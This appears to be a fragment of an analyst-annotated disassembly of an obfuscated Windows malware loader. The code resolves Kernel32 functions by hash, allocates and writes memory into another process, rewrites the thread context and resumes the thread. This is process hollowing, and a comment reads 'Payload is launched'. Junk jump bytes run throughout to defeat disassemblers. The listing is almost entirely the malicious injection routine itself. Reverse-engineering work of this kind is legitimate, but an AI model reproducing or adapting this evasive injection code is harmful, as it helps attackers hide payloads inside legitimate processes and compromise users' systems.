loc_934: ; ... seg000:00000934 8B 45 B4 mov eax, [ebp-4Ch] seg000:00000937 87 95 DC F7 FF FF xchg edx, [ebp-824h] seg000:0000093D FF 70 50 push dword ptr [eax+50h] seg000:00000940 83 E6 46 and esi, 46h seg000:00000943 EB 01 jmp short loc_946 seg000:00000945 D0 db 0D0h ; ð seg000:00000946 loc_946: ; ... seg000:00000946 FF 75 A4 push dword ptr [ebp-5Ch] seg000:00000949 6B F6 37 imul esi, 37h seg000:0000094C FF B5 B0 FC FF FF push dword ptr [ebp-350h] seg000:00000952 4B dec ebx seg000:00000953 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000958 E8 BC F6 FF FF call getModuleHandle seg000:0000095D 68 3F 66 52 64 push 6452663Fh ; VirtualAllocEx seg000:00000962 50 push eax seg000:00000963 E8 A0 F7 FF FF call getAPIAddress seg000:00000968 FF D0 call eax ; ******* VirtualAllocEx (); ******* seg000:0000096A 13 B5 F4 F7 FF FF adc esi, [ebp-80Ch] seg000:00000970 EB 03 jmp short loc_975 seg000:00000972 B0 db 0B0h ; ¦ seg000:00000973 C3 db 0C3h ; + seg000:00000974 8E db 8Eh ; Ä seg000:00000975 loc_975: ; ... seg000:00000975 6A 00 push 0 seg000:00000977 F7 DA neg edx seg000:00000979 EB 02 jmp short loc_97D seg000:0000097B E8 db 0E8h ; Þ seg000:0000097C 65 db 65h ; e seg000:0000097D loc_97D: ; ... seg000:0000097D 8B 45 B4 mov eax, [ebp-4Ch] seg000:00000980 4F dec edi seg000:00000981 EB 01 jmp short loc_984 seg000:00000983 F2 db 0F2h ; = seg000:00000984 loc_984: ; ... seg000:00000984 FF 70 54 push dword ptr [eax+54h] ; lpBuffer seg000:00000987 97 xchg eax, edi seg000:00000988 FF B5 4C FC FF FF push dword ptr [ebp-3B4h] ; lpBaseAddress seg000:0000098E F7 DF neg edi seg000:00000990 FF 75 A4 push dword ptr [ebp-5Ch] ; hProcess seg000:00000993 01 D2 add edx, edx seg000:00000995 FF B5 B0 FC FF FF push dword ptr [ebp-350h] seg000:0000099B 29 C0 sub eax, eax seg000:0000099D 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:000009A2 E8 72 F6 FF FF call getModuleHandle seg000:000009A7 68 1E 74 F0 00 push 0F0741Eh ; WriteProcessMemory seg000:000009AC 50 push eax seg000:000009AD E8 56 F7 FF FF call getAPIAddress seg000:000009B2 FF D0 call eax ; ******* WriteProcessMemory (); ******* seg000:000009B4 F7 D3 not ebx seg000:000009B6 EB 03 jmp short loc_9BB seg000:000009B8 CB db 0CBh ; - seg000:000009B9 6F db 6Fh ; o seg000:000009BA D7 db 0D7h ; Î seg000:000009BB loc_9BB: ; ... seg000:000009BB 83 F8 01 cmp eax, 1 seg000:000009BE 74 51 jz short memoryOK seg000:000009C0 seg000:000009C0 ; --------------------------------------------------------------------- seg000:000009C0 ; If there is a problem, terminate... seg000:000009C0 ; --------------------------------------------------------------------- seg000:000009C0 seg000:000009C0 01 DE add esi, ebx seg000:000009C2 6A 64 push 64h ; 'd' seg000:000009C4 46 inc esi seg000:000009C5 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:000009CA E8 4A F6 FF FF call getModuleHandle seg000:000009CF 68 42 AD 14 BB push 0BB14AD42h ; Sleep seg000:000009D4 50 push eax seg000:000009D5 E8 2E F7 FF FF call getAPIAddress seg000:000009DA FF D0 call eax ; ******* Sleep (); ****** seg000:000009DC 29 FA sub edx, edi seg000:000009DE EB 03 jmp short loc_9E3 seg000:000009E0 C5 db 0C5h ; + seg000:000009E1 24 db 24h ; $ seg000:000009E2 43 db 43h ; C seg000:000009E3 loc_9E3: ; ... seg000:000009E3 6A 00 push 0 seg000:000009E5 41 inc ecx seg000:000009E6 EB 03 jmp short loc_9EB seg000:000009E8 7B db 7Bh ; { seg000:000009E9 40 db 40h ; @ seg000:000009EA B0 db 0B0h ; ¦ seg000:000009EB loc_9EB: ; ... seg000:000009EB FF B5 B0 FC FF FF push dword ptr [ebp-350h] seg000:000009F1 11 F9 adc ecx, edi seg000:000009F3 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:000009F8 E8 1C F6 FF FF call getModuleHandle seg000:000009FD 68 33 EF BE E3 push 0E3BEEF33h ; TerminateProcess seg000:00000A02 50 push eax seg000:00000A03 E8 00 F7 FF FF call getAPIAddress seg000:00000A08 FF D0 call eax seg000:00000A0A F7 D6 not esi seg000:00000A0C E9 16 FE FF FF jmp loc_827 seg000:00000A11 seg000:00000A11 ; --------------------------------------------------------------------- seg000:00000A11 ; No problem, continue... seg000:00000A11 ; --------------------------------------------------------------------- seg000:00000A11 seg000:00000A11 memoryOK: ; ... seg000:00000A11 F7 D9 neg ecx seg000:00000A13 8B 45 B4 mov eax, [ebp-4Ch] seg000:00000A16 F7 D1 not ecx seg000:00000A18 EB 03 jmp short loc_A1D seg000:00000A1A FB db 0FBh ; ¹ seg000:00000A1B 55 db 55h ; U seg000:00000A1C 02 db 2 seg000:00000A1D loc_A1D: ; ... seg000:00000A1D 0F B7 48 06 movzx ecx, word ptr [eax+6] seg000:00000A21 F7 DB neg ebx seg000:00000A23 8D B0 F8 00 00 00 lea esi, [eax+0F8h] seg000:00000A29 F7 D2 not edx seg000:00000A2B copy_loop: ; ... seg000:00000A2B 81 F3 D7 00 00 00 xor ebx, 0D7h seg000:00000A31 51 push ecx seg000:00000A32 F7 D2 not edx seg000:00000A34 8B 85 4C FC FF FF mov eax, [ebp-3B4h] seg000:00000A3A 23 95 40 FC FF FF and edx, [ebp-3C0h] seg000:00000A40 EB 02 jmp short loc_A44 seg000:00000A42 D8 db 0D8h ; Ï seg000:00000A43 48 db 48h ; H seg000:00000A44 loc_A44: ; ... seg000:00000A44 03 46 14 add eax, [esi+14h] seg000:00000A47 21 D9 and ecx, ebx seg000:00000A49 8B 4D A4 mov ecx, [ebp-5Ch] seg000:00000A4C 47 inc edi seg000:00000A4D EB 01 jmp short loc_A50 seg000:00000A4F FD db 0FDh ; ² seg000:00000A50 loc_A50: ; ... seg000:00000A50 03 4E 0C add ecx, [esi+0Ch] seg000:00000A53 11 F7 adc edi, esi seg000:00000A55 EB 02 jmp short loc_A59 seg000:00000A57 45 db 45h ; E seg000:00000A58 07 db 7 seg000:00000A59 loc_A59: ; ... seg000:00000A59 21 C3 and ebx, eax seg000:00000A5B EB 03 jmp short loc_A60 seg000:00000A5D D3 db 0D3h ; Ë seg000:00000A5E CD db 0CDh ; - seg000:00000A5F 2F db 2Fh ; / seg000:00000A60 loc_A60: ; ... seg000:00000A60 6A 00 push 0 ; *lpNumberOfBytesWritten seg000:00000A62 0F AF D0 imul edx, eax seg000:00000A65 EB 01 jmp short loc_A68 seg000:00000A67 94 db 94h ; ö seg000:00000A68 loc_A68: ; ... seg000:00000A68 FF 76 10 push dword ptr [esi+10h] ; nSize seg000:00000A6B 29 C7 sub edi, eax seg000:00000A6D EB 02 jmp short loc_A71 seg000:00000A6F 2A db 2Ah ; * seg000:00000A70 8F db 8Fh ; Å seg000:00000A71 loc_A71: ; ... seg000:00000A71 50 push eax ; lpBuffer seg000:00000A72 33 9D 14 F8 FF FF xor ebx, [ebp-7ECh] ; lpBaseAddress seg000:00000A78 51 push ecx seg000:00000A79 F7 D1 not ecx seg000:00000A7B FF B5 B0 FC FF FF push dword ptr [ebp-350h] ; hProcess seg000:00000A81 4B dec ebx seg000:00000A82 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000A87 E8 8D F5 FF FF call getModuleHandle seg000:00000A8C 68 1E 74 F0 00 push 0F0741Eh ; WriteProcessMemory() seg000:00000A91 50 push eax seg000:00000A92 E8 71 F6 FF FF call getAPIAddress seg000:00000A97 FF D0 call eax ; ******* WriteProcessMemory (); ****** seg000:00000A99 41 inc ecx seg000:00000A9A 83 C6 28 add esi, 28h ; '(' seg000:00000A9D 01 DA add edx, ebx seg000:00000A9F 59 pop ecx seg000:00000AA0 1B 85 C0 FC FF FF sbb eax, [ebp-340h] seg000:00000AA6 49 dec ecx seg000:00000AA7 75 82 jnz short copy_loop seg000:00000AA9 ; seg000:00000AA9 ; seg000:00000AA9 ; seg000:00000AA9 ; seg000:00000AA9 seg000:00000AA9 23 95 C0 FC FF FF and edx, [ebp-340h] seg000:00000AAF C7 85 CC FC FF FF+ mov dword ptr [ebp-334h], 10007h seg000:00000AB9 31 F0 xor eax, esi seg000:00000ABB 8D 85 CC FC FF FF lea eax, [ebp-334h] ; -1 seg000:00000AC1 F7 D7 not edi seg000:00000AC3 EB 02 jmp short loc_AC7 seg000:00000AC5 BE db 0BEh ; ¥ seg000:00000AC6 22 db 22h ; " seg000:00000AC7 loc_AC7: ; ... seg000:00000AC7 50 push eax ; lpContext seg000:00000AC8 F7 D2 not edx seg000:00000ACA FF B5 B4 FC FF FF push dword ptr [ebp-34Ch] ; hThread seg000:00000AD0 89 F1 mov ecx, esi seg000:00000AD2 EB 02 jmp short loc_AD6 seg000:00000AD4 53 db 53h ; S seg000:00000AD5 9C db 9Ch ; £ seg000:00000AD6 loc_AD6: ; ... seg000:00000AD6 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000ADB E8 39 F5 FF FF call getModuleHandle seg000:00000AE0 68 55 63 55 89 push 89556355h ; GetThreadContext seg000:00000AE5 50 push eax seg000:00000AE6 E8 1D F6 FF FF call getAPIAddress seg000:00000AEB FF D0 call eax ; ******* GetThreadContext (); ******* seg000:00000AED 83 C7 5E add edi, 5Eh ; '^' seg000:00000AF0 8B 85 70 FD FF FF mov eax, [ebp-290h] seg000:00000AF6 43 inc ebx seg000:00000AF7 83 C0 08 add eax, 8 seg000:00000AFA F7 D1 not ecx seg000:00000AFC 6A 00 push 0 seg000:00000AFE 0F AF D6 imul edx, esi seg000:00000B01 6A 04 push 4 seg000:00000B03 87 DF xchg ebx, edi seg000:00000B05 8D 4D A4 lea ecx, [ebp-5Ch] seg000:00000B08 F7 D6 not esi seg000:00000B0A 51 push ecx seg000:00000B0B 11 CA adc edx, ecx seg000:00000B0D 50 push eax seg000:00000B0E 21 C9 and ecx, ecx seg000:00000B10 FF B5 B0 FC FF FF push dword ptr [ebp-350h] seg000:00000B16 33 5D C0 xor ebx, [ebp-40h] seg000:00000B19 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000B1E E8 F6 F4 FF FF call getModuleHandle seg000:00000B23 68 1E 74 F0 00 push 0F0741Eh ; WriteProcessMemory() seg000:00000B28 50 push eax seg000:00000B29 E8 DA F5 FF FF call getAPIAddress seg000:00000B2E FF D0 call eax ; ******* WriteProcessMemory (); ******* seg000:00000B30 43 inc ebx seg000:00000B31 8B 45 B4 mov eax, [ebp-4Ch] seg000:00000B34 11 C9 adc ecx, ecx seg000:00000B36 8B 40 28 mov eax, [eax+28h] seg000:00000B39 F7 D7 not edi seg000:00000B3B EB 01 jmp short loc_B3E seg000:00000B3D 81 db 81h ; ü seg000:00000B3E loc_B3E: ; ... seg000:00000B3E 03 45 A4 add eax, [ebp-5Ch] seg000:00000B41 0F AF F8 imul edi, eax seg000:00000B44 EB 01 jmp short loc_B47 seg000:00000B46 49 db 49h ; I seg000:00000B47 loc_B47: ; ... seg000:00000B47 89 85 84 FD FF FF mov [ebp-27Ch], eax seg000:00000B4D 83 75 A8 10 xor dword ptr [ebp-58h], 10h seg000:00000B51 8D 85 CC FC FF FF lea eax, [ebp-334h] seg000:00000B57 01 F2 add edx, esi seg000:00000B59 50 push eax seg000:00000B5A 4F dec edi seg000:00000B5B FF B5 B4 FC FF FF push dword ptr [ebp-34Ch] seg000:00000B61 09 D9 or ecx, ebx seg000:00000B63 EB 03 jmp short loc_B68 seg000:00000B65 0D db 0Dh seg000:00000B66 16 db 16h seg000:00000B67 7F db 7Fh ; seg000:00000B68 loc_B68: ; ... seg000:00000B68 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000B6D E8 A7 F4 FF FF call getModuleHandle seg000:00000B72 68 55 C3 55 89 push 8955C355h ; SetThreadContext seg000:00000B77 50 push eax seg000:00000B78 E8 8B F5 FF FF call getAPIAddress seg000:00000B7D FF D0 call eax ; ******* SetThreadContext (); ******* seg000:00000B7F 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000B84 81 DB D1 00 00 00 sbb ebx, 0D1h ; 'Ð' seg000:00000B8A E8 8A F4 FF FF call getModuleHandle seg000:00000B8F 8B 9D 0C F8 FF FF mov ebx, [ebp-7F4h] seg000:00000B95 68 83 62 4C CE push 0CE4C6283h ; ExitProcess seg000:00000B9A 49 dec ecx seg000:00000B9B EB 01 jmp short loc_B9E seg000:00000B9D 6D db 6Dh ; m seg000:00000B9E loc_B9E: ; ... seg000:00000B9E 50 push eax seg000:00000B9F 01 85 34 FC FF FF add [ebp-3CCh], eax seg000:00000BA5 E8 5E F5 FF FF call getAPIAddress seg000:00000BAA 19 F9 sbb ecx, edi seg000:00000BAC 50 push eax seg000:00000BAD 21 FE and esi, edi seg000:00000BAF 89 E1 mov ecx, esp seg000:00000BB1 83 F6 3B xor esi, 3Bh seg000:00000BB4 EB 03 jmp short loc_BB9 seg000:00000BB6 66 db 66h ; f seg000:00000BB7 02 db 2 seg000:00000BB8 05 db 5 seg000:00000BB9 loc_BB9: ; ... seg000:00000BB9 8B 85 90 FD FF FF mov eax, [ebp-270h] seg000:00000BBF 4E dec esi seg000:00000BC0 6A 00 push 0 seg000:00000BC2 4A dec edx seg000:00000BC3 EB 02 jmp short loc_BC7 seg000:00000BC5 B7 db 0B7h ; À seg000:00000BC6 64 db 64h ; d seg000:00000BC7 loc_BC7: ; ... seg000:00000BC7 6A 04 push 4 seg000:00000BC9 81 D6 91 00 00 00 adc esi, 91h ; 'æ' seg000:00000BCF EB 02 jmp short loc_BD3 seg000:00000BD1 EC db 0ECh ; ý seg000:00000BD2 EE db 0EEh ; ¯ seg000:00000BD3 loc_BD3: ; ... seg000:00000BD3 51 push ecx seg000:00000BD4 21 95 5C FC FF FF and [ebp-3A4h], edx seg000:00000BDA 50 push eax seg000:00000BDB 81 C9 B2 00 00 00 or ecx, 0B2h seg000:00000BE1 FF B5 B0 FC FF FF push dword ptr [ebp-350h] seg000:00000BE7 1B 45 98 sbb eax, [ebp-68h] seg000:00000BEA EB 02 jmp short loc_BEE seg000:00000BEC D9 db 0D9h ; + seg000:00000BED D5 db 0D5h ; i seg000:00000BEE loc_BEE: ; ... seg000:00000BEE 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000BF3 E8 21 F4 FF FF call getModuleHandle seg000:00000BF8 68 1E 74 F0 00 push 0F0741Eh ; WriteProcessMemory() seg000:00000BFD 50 push eax seg000:00000BFE E8 05 F5 FF FF call getAPIAddress seg000:00000C03 FF D0 call eax seg000:00000C05 F7 DA neg edx seg000:00000C07 58 pop eax seg000:00000C08 81 65 A0 D0 00 00+ and dword ptr [ebp-60h], 0D0h seg000:00000C0F EB 01 jmp short loc_C12 seg000:00000C11 E8 db 0E8h ; Þ seg000:00000C12 loc_C12: ; ... seg000:00000C12 F7 DE neg esi seg000:00000C14 FF B5 B4 FC FF FF push dword ptr [ebp-34Ch] seg000:00000C1A 23 8D 48 FC FF FF and ecx, [ebp-3B8h] seg000:00000C20 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000C25 E8 EF F3 FF FF call getModuleHandle seg000:00000C2A 68 AF A6 B5 34 push 34B5A6AFh ; ResumeThread seg000:00000C2F 50 push eax seg000:00000C30 E8 D3 F4 FF FF call getAPIAddress seg000:00000C35 FF D0 call eax ; ******* ResumeThread (); ******* seg000:00000C37 seg000:00000C37 seg000:00000C37 ; ==============> Ok, Payload is launched !!!!! seg000:00000C37 seg000:00000C37 seg000:00000C37 F7 D2 not edx seg000:00000C39 68 00 40 00 00 push 4000h seg000:00000C3E 48 dec eax seg000:00000C3F FF 75 F4 push dword ptr [ebp-0Ch] seg000:00000C42 89 55 C0 mov [ebp-40h], edx seg000:00000C45 FF B5 4C FC FF FF push dword ptr [ebp-3B4h] seg000:00000C4B 81 D3 F7 00 00 00 adc ebx, 0F7h ; '¸' seg000:00000C51 EB 01 jmp short loc_C54 seg000:00000C53 7D db 7Dh ; } seg000:00000C54 loc_C54: ; ... seg000:00000C54 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000C59 E8 BB F3 FF FF call getModuleHandle seg000:00000C5E 68 54 87 30 A8 push 0A8308754h ; VirtualFree seg000:00000C63 50 push eax seg000:00000C64 E8 9F F4 FF FF call getAPIAddress seg000:00000C69 FF D0 call eax seg000:00000C6B loc_C6B: ; ... seg000:00000C6B 1B 4D E4 sbb ecx, [ebp-1Ch] seg000:00000C6E EB 02 jmp short loc_C72 seg000:00000C70 49 db 49h ; I seg000:00000C71 14 db 14h seg000:00000C72 loc_C72: ; ... seg000:00000C72 6A 00 push 0 seg000:00000C74 F7 D6 not esi seg000:00000C76 68 45 98 BB F3 push 0F3BB9845h ; 'Kernel32.dll' seg000:00000C7B E8 99 F3 FF FF call getModuleHandle seg000:00000C80 68 83 62 4C CE push 0CE4C6283h ; ExitProcess seg000:00000C85 50 push eax seg000:00000C86 E8 7D F4 FF FF call getAPIAddress seg000:00000C8B FF D0 call eax seg000:00000C8D 31 FB xor ebx, edi seg000:00000C8F C9 leave seg000:00000C90 C3 retn seg000:00000C90 seg000 ends seg000:00000C90 end